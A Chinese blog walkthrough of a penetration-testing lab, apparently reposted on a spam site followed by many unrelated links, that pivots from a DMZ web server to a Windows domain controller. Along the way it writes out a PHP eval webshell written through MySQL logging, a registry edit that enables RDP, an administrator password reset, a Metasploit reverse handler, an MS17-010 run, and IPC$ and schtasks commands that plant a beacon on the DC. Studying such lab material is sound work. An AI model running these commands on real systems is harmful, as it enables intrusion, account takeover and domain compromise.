当前位置: 首页 > wzjs >正文

中国行业网站联盟cps推广联盟

中国行业网站联盟,cps推广联盟,电商 做图 网站,营业推广策略内网入门靶场练习 一:内网渗透 1、渗透流程 从DZM区域中的WEB Server(win7)进行渗透、DMZ和办公区域(Win2k3)有一定联系、将DMZ中的计算机当作跳板,利用隧道技术连接到内网办公区(Win2k3),然后办公区和C…

内网入门靶场练习

一:内网渗透

1、渗透流程

从DZM区域中的WEB Server(win7)进行渗透、DMZ和办公区域(Win2k3)有一定联系、将DMZ中的计算机当作跳板,利用隧道技术连接到内网办公区(Win2k3),然后办公区和CD有一定的联系、这样我们就可以攻入内网拿下
DC

2、网络拓扑图

2-1 设备配置

攻击者:windows11一台 、 kali 一台
DMZ区域:web服务win7一台、Mail服务win7一台
内网区域:内网办公区win2003一台、DC win2008服务器一台
在这里插入图片描述

2-2 网络配置

外网IP段—>NAT----->192.168.64.0
内网IP段—>VM4----->192.168.111.0

二:环境配置

1、域环境配置

windows Server2008配置为CD,将win7-1 、win7-2和win2003加入域中!

2、网络配置

2-1 DMZ区-win7-1

(1)win7作为DMZ区域中的web服务器;需要双网卡(外网可以通过公网IP访问web服务,wi7可以通内网ip与内网进行交互);当然我我为了方便直接将公网配置为了NAT、也可自行设置公网网段

外网IP段--->VM3----->192.168.52.0
内网IP段--->NAT----->(自动分配)

在这里插入图片描述

(2)配置静态IP

在这里插入图片描述

(3)配置公网IP

在这里插入图片描述

2-2 DMZ区-win7-2

(1)和win7-1类似只需要分配内网IP就行

2-3 内网办公区

(1)配置网卡为vm3(内网),配置内网ip 192.168.52.141

2-4 DC配置

(1)配置内网IP 192.168.52.138

2-5 攻击机

(1)由于公网网段设置的是NAT,所以不必配置,如果自己设置了公网网段、那么攻击机kali和windows就需要设置双网卡,设置双网卡的目的就是kali可以和DMZ中web服务的公网IP可以访问。

三:内网渗透

1、web服务器渗透

也就是我们平常看到的网页;首先就是进行信息收集;然后漏洞扫描、漏洞挖掘、漏洞利用、获取权限、权限提升等;最终的目的就是那先win7然后进一步进行内网渗透!

1-1 端口扫描

nmap扫描发现开启了80端口和3306端口(也就是数据库端口)
在这里插入图片描述

访问一下80端口出现php探针网址:php探针就是探测服务器配置的;发现并没有什么可以利用的

在这里插入图片描述

1-2 目录扫描

扫描出了数据库的后台登录网址和beifen.rar 文件;尝试数据库的弱口令爆破

在这里插入图片描述

爆破出了账号和密码 root/root
在这里插入图片描述

1-3 phpmyadmin写shell

写shell条件

绝对路径已知
网站权限为root
secure_priv_file= 为非 NULL 的空值

参考连接:https://blog.csdn.net/weixin_46365325/article/details/140555451
(4)日志写入shell

general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话

SHOW VARIABLES LIKE 'general%';
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/l.php';
select '<?php eval($_POST[1]); ?>';

在这里插入图片描述

1-4 webshell连接

在这里插入图片描述

1-4 远控拿下桌面

(1)查看ip :我们成功得到了服务器的内网ip ,此时我们是没有办法访问内网的,需要利用web服务当作跳板渗透内网

在这里插入图片描述

(2)开启3389服务

#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f#通过net user知道用户未administrator;但是不知道密码,直接修改
net user administrator admin@123  #更改密码
net user administrator /active:yes #激活密码

(3)连接

在这里插入图片描述

2、内网渗透拿下域内主机

拿下web应用服务器也就是DMZ的计算机;接下来就是利用这台主机当作跳板内网渗透拿下域内主机(内网办公主机window2003)
在这里插入图片描述

2-1 内网渗透

(1)域内信息收集以及存活探测;可以知道域名、存活主机以及CD
在这里插入图片描述

2-2 CS、MSF联动后渗透

(1)CS上线MDZ区的web服务器

上传木马
在这里插入图片描述

运行CS上线

在这里插入图片描述
(3)权限共享
将cs拿到的权限共享MSF,msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.xxx.xxx
set lport 9999
exploit/run

CS共享权限

在这里插入图片描述
pawn 发送到msf(将win7的shell共享给msf)
在这里插入图片描述

2-3 搭建隧道

(1)CS搭建sockets隧道(当然有很多方法)

在这里插入图片描述
(2)查看隧道信息

在这里插入图片描述

2-4 MSF利用隧道渗透

(1)隧道技术后直接拿下域内主机(域内主机存在永痕之蓝漏洞)

#返回
background
setg Proxies socks4:192.168.xxx.xxx:20808
search ms17_010
use 19
#设置域内主机Ip
set rhosts 192.168.52.141
run #payload
set command ipconfig

在这里插入图片描述

3、域环境渗透拿下DC

3-1 信息收集

(1)通过上述的信息收集和存活主机探测:知道域是god.org ,域控的名称为owa,DC的内网IP是192.168.52.138
(2)本地用户和域用户的区别
本地用户就是本地登录、账号和密码存放在本机;域用户就是加入域的用户,账号和密码由DC统一管理和分配
(3)域用户的判断

net time /domain
  • 存在域,当前用户是域用户
  • 存在域,当前用户是本地用户—>回显系统错误
  • 不存在域—>回显找不到DC

3-2 CS上线DC(不出网)

(1)生成一个监听器
在这里插入图片描述

(2)生成木马
在这里插入图片描述

(3)现在出现一个问题,木马怎么上传到DC中呢,我们可以利用CS抓取密码;然后和DC之间建立IPC进程通信

  • 抓取密码
    在这里插入图片描述

  • 建立IPC通信(现在wen服务器和DC已经建立安全信任关系了,直接上传木马)

#建立连接
shell net use \\192.168.52.138\ipc$ "password" /user:god\administrator
#查看连接
shell net use
  • 文件上传

上传到web服务器中,然后利用web服务器上传到到DC中

在这里插入图片描述

  • 上传到DC中,然后创建定时任务
#将木马从win7上传DC
shell copy beacon.exe \\192.168.52.138\c$
#设置计划任务
shell schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f
#运行计划任务test
shell schtasks /run /s 192.168.52.138 /i /tn "test"
#建立连接
connect 192.168.52.138
link 192.168.52.138

3-3 拿下DC

(1)CS成功上线

在这里插入图片描述
(2)查看ip

在这里插入图片描述

3-4 横向移动

(1)就做一个简单演示、当然方法很多;横向移动连接域内主机

在这里插入图片描述
在这里插入图片描述
上线域内主机win 2003(结束!!!)

在这里插入图片描述

四:渗透总结

1、总结

本次内网渗透是很简单的、都是存在漏洞的、在实战中可能拿下DMZ区域都是肯困难的,希望感兴趣的的可以深入学习内网渗透、不借助工具可以拿下DC!!!


文章转载自:

http://S6hxjaeE.jphxt.cn
http://xkvtMMKU.jphxt.cn
http://F0xgGsUp.jphxt.cn
http://biqtDo9G.jphxt.cn
http://Xn6MEnQF.jphxt.cn
http://K5C6IqTb.jphxt.cn
http://3GiXNQQy.jphxt.cn
http://31vN8mtq.jphxt.cn
http://jMzHq6p4.jphxt.cn
http://yMAGmTwR.jphxt.cn
http://ekZdav16.jphxt.cn
http://ttjqVAQP.jphxt.cn
http://StCn6RKD.jphxt.cn
http://YD9MTOjd.jphxt.cn
http://3wbNKzCb.jphxt.cn
http://OkZ07wcE.jphxt.cn
http://Am18kGAj.jphxt.cn
http://nomamMTG.jphxt.cn
http://dAReohyI.jphxt.cn
http://MhJkqmqx.jphxt.cn
http://UXU3A1IG.jphxt.cn
http://NLZ7Fmj0.jphxt.cn
http://vDFvUQ1U.jphxt.cn
http://w9918Hps.jphxt.cn
http://YnAUxMT6.jphxt.cn
http://DvH3mNOn.jphxt.cn
http://zgxJ4Gmk.jphxt.cn
http://ZKd3GUlL.jphxt.cn
http://aYNUk4e7.jphxt.cn
http://ghch0uDe.jphxt.cn
http://www.dtcms.com/wzjs/762987.html

相关文章:

  • 东莞网站建设代理商wordpress替换google字体
  • 公司信息网站建设目标免费推广方式都有哪些
  • 广州一次做网站深圳创业补贴
  • 嘉定网站建设网页制作线上企业订单管理系统网站
  • 网站为何站长统计wordpress 整站下载
  • 东钱湖镇建设局网站网页设计与网站建设试题及答案
  • 北京网站建设公司朝阳黑龙江省建设造价协会网站
  • wamp配置多个网站小程序服务开发公司
  • 网站面包屑导航桂林市风尚网络科技有限公司
  • 汽配网站建设成本凡科网门店通
  • 通过网站做外贸东营大众网
  • 天津网站制作的公司智能小程序开发者平台
  • 贾汪区住房和城乡建设局网站盐城网站建设要多少钱
  • 天津市中小企业局网站wordpress网站打包app
  • php网站开发案例建设有限公司
  • wordpress 信息网站网站版式布局
  • 企业网站有哪些内容网站页面设计和结构的技巧
  • 科技企业网站设计制作清远头条新闻
  • 柳州市住房和城乡建设部网站阿里云企业邮箱收费标准
  • 温州专业网站开发网站设计网站留言板作用
  • wordpress响应式网站模板外包网站建设是什么意思
  • 盐城网站建设有限公司专业营销团队公司
  • 网站建设的投资预算怎么写好看的wordpress模版
  • 济南网站建设策划方案网页开发哪家好
  • 网站功能分析沈阳网站备案照相
  • 各大网站的网址网站开发培训班多少报名费
  • 贵州光利达建设工程有限公司局网站为网站做外链的方式
  • 宏发建设有限公司网站学校学院网站建设目标
  • 手机当服务器建网站家具网站建设的前景分析
  • 公司网站建设的会计分录课程商城网站模板